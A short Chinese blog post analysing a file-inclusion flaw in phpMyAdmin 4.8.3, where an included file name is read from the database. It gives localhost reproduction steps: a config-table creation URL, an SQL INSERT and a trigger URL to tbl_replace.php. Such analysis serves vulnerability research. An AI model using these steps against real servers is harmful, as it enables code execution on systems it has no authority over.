写在前面
老感觉phpmyadmin这东西一直在爆洞,前段时间刚好碰到一个有phpmyadmin和数据库密码,4.8.3的版本,潜意识的以为这种大家看烂了最新版应该很安全了,还是太菜了。
漏洞分析
漏洞其实很简单,就是有个文件包含的地方,文件名是从数据库里取的。所以漏洞触发就是先改数据库,把文件名改成我们需要包含的恶意文件,再去包含触发。
tbl_replace.php 220行
- 生成phpmyadmin配置表
http://127.0.0.1/phpMyAdmin-4.8.3-english/phpMyAdmin-4.8.3-english/chk_rel.php?fixall_pmadb=1&db=mysql 在mysql数据库中生成配置表
- 修改数据库
`INSERT INTO pma__column_info SELECT '1', 'mysql', 'test', 'test', 'test',
'test', 'test', 'test',
'thisisatest','test';`先随便插入一条测试一下,代码里加个var_dump输出瞅瞅。
- 触发
http://127.0.0.1/phpMyAdmin-4.8.3-english/phpMyAdmin-4.8.3-english/tbl_replace.php?db=mysql&table=test&where_clause=1=1&fields_name[multi_edit][][]=test&clause_is_unique=1
var_dump输出的包含路径如上图。
- 利用
这里我是windows不包含session文件,直接包含一个含有恶意代码的jpg文件进行测试。
先修改路径。
几个小坑
- 生成配置表需要在已有的数据库
- 插入的数据要和触发时的参数如table,db等参数一致
